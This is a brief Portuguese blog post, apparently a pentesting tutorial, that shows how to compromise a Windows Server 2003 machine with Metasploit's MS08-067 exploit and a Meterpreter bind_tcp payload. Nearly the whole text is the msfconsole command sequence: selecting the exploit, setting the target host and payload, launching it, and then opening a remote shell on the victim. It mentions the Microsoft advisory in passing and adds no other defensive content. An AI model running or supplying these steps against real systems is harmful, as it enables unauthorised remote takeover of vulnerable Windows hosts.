20/06/10

Exploit ms08_067_netapi + payload bind_tcp

MrTcp - Exploit ms08_067_netapi + payload bind_tcp

 

 

Ola desta vez vamos usar o exploit ms08_067_netapi  com a payload bind_tcp no meterpreter, mais informações sobre esta falha nos sistemas da Microsoft e como resolver pode ver neste link : MS08-067


PAYLOAD= windows/meterpreter/bind_tcp
EXPLOIT= exploit/smb/ms08_067_netapi

IP local= 192.168.1.4
IP remoto= 192.168.1.2

SO local = Backtrack4
SO remoto = Windows Server 2003 SP0

//Abrir o MetaSploit

# cd /pentest/exploit/framework3
#./msfconsole

//Escolher Exploit ms08_067_netapi

#use windows/smb/ms08_067_netapi

//Ver Opçoes

#show options

//Definir opçoes

#set RHOST 192.168.1.2

//Definir payload

#set payload windows/meterpreter/bind_tcp

//explorar a maquina

#exploit

//Se tudo correu bem ate aqui já estamos na maquina alvo, podemos executar o comando #help
 para ver todas as opções do framework disponíveis. Se quisermos abrir o DOS da maquina alvo e só digitar o comando #shell

0 comentários: